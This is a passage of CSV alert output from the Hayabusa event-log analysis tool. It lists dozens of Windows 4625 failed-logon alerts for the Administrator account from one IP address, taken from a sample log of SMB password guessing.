NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.876 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BZYExQroYH65tPuG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.913 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: llU5DQBrIrV3VtG5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.953 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HV17iXOYQqs2ntax | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.994 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: esZnEeyGdPa22PsL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rlYFTP9a2wdi5A2n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.075 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oJifU0PnO1Ntp6z3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xGKdKjJy28Qd1whT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.166 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x3L4BYjYJYlvuYHE | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.206 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ui5RoLKttDo0wfFJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: G2xjdWobsxBjo6p7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.293 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TPeQ0M5lXITI84G3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.337 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uu72qx4lG5ZRM7xf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.392 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zD072YR1hIgbzjaT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.449 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EqA7HDvImIlCiFq2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.508 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: efYFxZwMGEC3vVi7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.552 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6WmMHYegvFJvv6zd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.601 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DS9WkRnP0B5MgaeX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.656 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y5jNPV7ZgFExgg9n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.707 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V1FJ6vm3wK97iual | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.753 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GLuIx0sfF8NQD8QY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.800 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y3lMvcrrmGTkjdlh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.854 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2ZqOabcNMeazs6TC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j2AbE9D8PvuFDBz5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.966 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wzWdLEEc68ZvviGh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.030 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AtV3BuZiljbAeikO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tnKKfcwikNDdYOam | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.125 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jSbbzD7fpJY4Q1JL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.175 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gOASpLLE25ruCnGW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1jhUGOtszbPUwccL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.271 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yB8Mzo1RppdpLFKS | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.312 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rOwoUlHGVeSbAhuN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BXIEHbkrjwedeaih | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.401 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OvsKoixgEzUgAyie | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.504 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TzaZe6Y4Tdfjseuk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.555 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FEmbuU3CAC3CecZy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.597 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kfBmqmVPd0CGVUsD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Uz3TlU6yrcveM1w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z6hH6AkkgBFmeZ6u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.721 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J2J1W2WhA6Pj7j5j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.769 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: soHOxnkoOn7ot0My | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4c2oWI6mRIvSVSKq | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FKsXD8aTyaC4fBqq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.906 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qrzji5ucmutsZNpo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.952 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BApOU105FCLwj4zn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.996 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EO50f7NfrrdwwCNA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PfTYbWC8IjW87th8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.069 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wLnE6zm5US4maK04 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.112 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5AV7taC7hYQdVjAj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.153 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8MnnaSRs0bnYVlMX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.198 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YgqavZ1SuNvX7RgH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.247 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IQvoIsfW0LhDit2Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 33IPGQXc1MarY30J | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.353 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: II4Ly9LnkWlq60Ux | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.401 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wncfJC7kDSI7O9Ud | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.444 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6XzbWef3PuzQK3FJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5M5670HdNC6c8O56 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ea8FcddgLyV5o6oL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.573 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LjyhmKFdBNrHIvTJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.620 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PIF47pEWBMp6Nbym | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.661 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6TO891WvJPkdjsct | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6cLnJYpHEzGAvhWG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.749 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gy6cFTrwrpRQFxfQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gxz612Z88PMCKzAk | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GSPC8hibdZdyOcex | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.893 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6vlmykLeFmuhn81B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.933 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4w4lEW9w53zMFPcc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.970 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jt2lDRFWwi6adwlB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.021 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: G9MGvle35u5OGB5o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.065 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TJgLFM2vrnKuj5N3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.106 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l8HRyDAzwKj9bfnA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.144 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J65LcwnRgEob9wjY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yhas9e1fwDZ1Fxvt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p5qJRSpjS6tZJjNQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.268 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bo4HAgP2tw0GmZ4o | IP Addr: 192.168.198.149 | AuthPackage: 
